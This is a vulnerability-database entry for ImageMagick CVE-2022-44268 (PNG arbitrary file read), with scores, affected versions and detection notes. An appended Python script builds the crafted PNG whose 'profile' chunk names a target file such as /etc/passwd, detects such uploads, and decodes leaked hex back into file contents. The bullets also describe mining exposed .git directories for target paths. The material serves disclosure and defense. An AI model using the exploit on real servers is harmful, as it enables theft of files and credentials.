cbcvebase.
CVE-2022-44268
published 2023-02-06


Priority: P2 (62) · Severity: medium · CVSS 3.1 base score: 6.5
Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
Exploit: public PoC available
EPSS: 89.85% (99.8th percentile)
ImageMagick 7.1.0-49 is vulnerable to information disclosure. When it parses a PNG image (e.g., for a resize), the resulting image can have the content of an arbitrary file embedded in it (if the magick binary has permission to read that file).

Affected

6 ranges
Vendor      | Product     | Version range                        | Fixed in
debian      | imagemagick | < 8:6.9.11.60+dfsg-1.6 (bookworm)    | 8:6.9.11.60+dfsg-1.6 (bookworm)
imagemagick | imagemagick | (no range listed)                    | (none listed)
imagemagick | imagemagick | >= 0 < 8:6.9.11.60+dfsg-1.3+deb11u1  | 8:6.9.11.60+dfsg-1.3+deb11u1
imagemagick | imagemagick | >= 0 < 8:6.9.11.60+dfsg-1.6          | 8:6.9.11.60+dfsg-1.6
imagemagick | imagemagick | >= 0 < 8:6.9.11.60+dfsg-1.6          | 8:6.9.11.60+dfsg-1.6
imagemagick | imagemagick | >= 0 < 8:6.9.11.60+dfsg-1.6          | 8:6.9.11.60+dfsg-1.6

Detection & IOCs (extracted from sources)

version: ImageMagick <= 7.1.0-49
filename: exploit.png
command: identify -verbose result.png
  • Source writeups pair this bug with an exposed `.git` directory: attackers dump the application source from it to learn internal paths, binary locations and database paths, which then become the targets of the file-read (LFI-style) exploitation that follows.
  • The attacker must upload a specially crafted PNG to an ImageMagick-backed image processing endpoint, download the resulting image, and decode the hex-encoded 'Raw profile type' metadata field to recover the exfiltrated file contents.
  • Monitor image upload endpoints for PNGs carrying tEXt/zTXt/iTXt chunks whose keyword is 'profile' and whose text is a filesystem path (e.g., /etc/passwd, /var/db/*); that chunk is the payload mechanism for CVE-2022-44268.
  • Debian fixed versions: 8:6.9.11.60+dfsg-1.6 for bookworm, sid, trixie and forky, and 8:6.9.11.60+dfsg-1.3+deb11u1 for bullseye. A Debian ImageMagick package older than these indicates a vulnerable system.
  • Exploitation requires the magick binary to have read permission on the target file; files unreadable by the ImageMagick process cannot be exfiltrated.
  • The PoC at https://github.com/voidz0r/CVE-2022-44268 requires Rust as a prerequisite to build and run.
  • If the server returns an empty 'Raw profile type' field in the output image metadata, the target file either does not exist or is not readable by the ImageMagick process.
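As an added example (my code, not the page's and not the voidz0r PoC, which is a Rust tool), the three steps the bullets above describe in one Python script: building the crafted PNG (a text chunk keyed 'profile' whose text is the path to read), scanning an uploaded PNG's tEXt/zTXt/iTXt chunks for that pattern as the detection check, and decoding the hex rows printed under 'Raw profile type' by `identify -verbose` back into file bytes, returning None for the empty-field case the last bullet describes. The sample `identify` output is constructed by hand, and the allowance for a decimal byte-count line preceding the hex rows is my assumption about ImageMagick's raw-profile text layout, not something the page states.

```python
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Text that starts with an absolute POSIX path or a Windows drive path (/etc/passwd, /var/db/*).
PATH_RE = re.compile(rb"^\s*(?:/|[A-Za-z]:[\\/])")


def _chunk(ctype, data):
    """Encode one PNG chunk: 4-byte length, type, data, CRC32 over type+data."""
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data) & 0xFFFFFFFF)


def build_png(target_path=None, chunk_type=b"tEXt"):
    """1x1 RGB PNG; if target_path is given, add a 'profile' text chunk naming it (the trigger)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, colour type 2 (RGB)
    chunks = [_chunk(b"IHDR", ihdr)]
    if target_path is not None:
        path = target_path.encode("latin-1")
        if chunk_type == b"tEXt":
            chunks.append(_chunk(b"tEXt", b"profile\x00" + path))
        else:  # zTXt: keyword, NUL, compression method 0, deflated text
            chunks.append(_chunk(b"zTXt", b"profile\x00\x00" + zlib.compress(path)))
    chunks.append(_chunk(b"IDAT", zlib.compress(b"\x00\x00\x00\x00")))  # filter byte + one black pixel
    chunks.append(_chunk(b"IEND", b""))
    return PNG_SIG + b"".join(chunks)


def iter_chunks(png):
    """Yield (type, data) per chunk; reject non-PNG input, truncation and bad CRCs."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        if pos + 12 + length > len(png):
            raise ValueError("truncated chunk")
        data = png[pos + 8:pos + 8 + length]
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])[0]:
            raise ValueError("bad CRC in %r chunk" % ctype)
        yield ctype, data
        pos += 12 + length
        if ctype == b"IEND":
            break


def text_chunk_value(ctype, data):
    """(keyword, text) for tEXt/zTXt/iTXt chunks, inflating compressed text; None for other chunks."""
    if ctype not in (b"tEXt", b"zTXt", b"iTXt"):
        return None
    kw, _, rest = data.partition(b"\x00")
    if ctype == b"tEXt":
        return kw, rest
    if len(rest) < 2:  # malformed compressed chunk: nothing to inflate
        return kw, b""
    if ctype == b"zTXt":
        return kw, zlib.decompress(rest[1:])  # rest[0] = compression method
    compressed, rest = rest[0], rest[2:]      # iTXt: compression flag, compression method
    _lang, _, rest = rest.partition(b"\x00")
    _translated, _, val = rest.partition(b"\x00")
    return kw, zlib.decompress(val) if compressed else val


def find_profile_path_chunks(png):
    """Detection: text chunks keyed 'profile' whose text looks like a filesystem path."""
    hits = []
    for ctype, data in iter_chunks(png):
        kv = text_chunk_value(ctype, data)
        if kv and kv[0].lower() == b"profile" and PATH_RE.match(kv[1]):
            hits.append((ctype.decode("ascii"), kv[1].decode("latin-1")))
    return hits


def decode_raw_profile(identify_output):
    """Hex rows under 'Raw profile type' in `identify -verbose` output -> bytes; None if absent/empty."""
    lines = identify_output.splitlines()
    start = next((i for i, ln in enumerate(lines) if ln.strip().startswith("Raw profile type")), None)
    if start is None:
        return None
    rows = []
    for line in lines[start + 1:]:
        s = line.strip()
        if s and not re.fullmatch(r"[0-9a-fA-F]+", s):
            break  # next property reached
        if s:
            rows.append(s)
    # Assumption about the raw-profile layout: a decimal byte count may precede the hex rows.
    if len(rows) > 1 and rows[0].isdigit() and int(rows[0]) == len("".join(rows[1:])) // 2:
        rows = rows[1:]
    body = "".join(rows)
    return bytes.fromhex(body) if body else None


# Constructed sample of `identify -verbose result.png` output (not a real capture); hex of "root:x:0:0:root:/root:/bin/bash\n".
SAMPLE_IDENTIFY_OUTPUT = """\
    Raw profile type:

           32
     726f6f743a783a303a303a726f6f743a2f726f6f743a2f62696e2f626173680a
    date:create: 2023-02-06T00:00:00+00:00
"""
# Constructed output for the case where the target did not exist or was unreadable by the magick process.
SAMPLE_EMPTY_OUTPUT = "    Raw profile type:\n\n    date:create: 2023-02-06T00:00:00+00:00\n"
```

To use it on a real result image, pass the text of `identify -verbose result.png` to decode_raw_profile(); to gate an upload endpoint, reject any file for which find_profile_path_chunks() returns a non-empty list. The detection keys on the 'profile' keyword the page names, which is the one the vulnerable PNG coder acts on; an unreadable or missing target shows up as decode_raw_profile() returning None, matching the empty 'Raw profile type' field described above.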

CVSS provenance

Source        | Version | Score | Severity | Vector
nvd           | v3.1    | 6.5   | MEDIUM   | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
osv           |         | 6.5   | MEDIUM   |
vendor_debian |         | 6.5   | MEDIUM   |
vendor_redhat |         | 6.5   | MEDIUM   |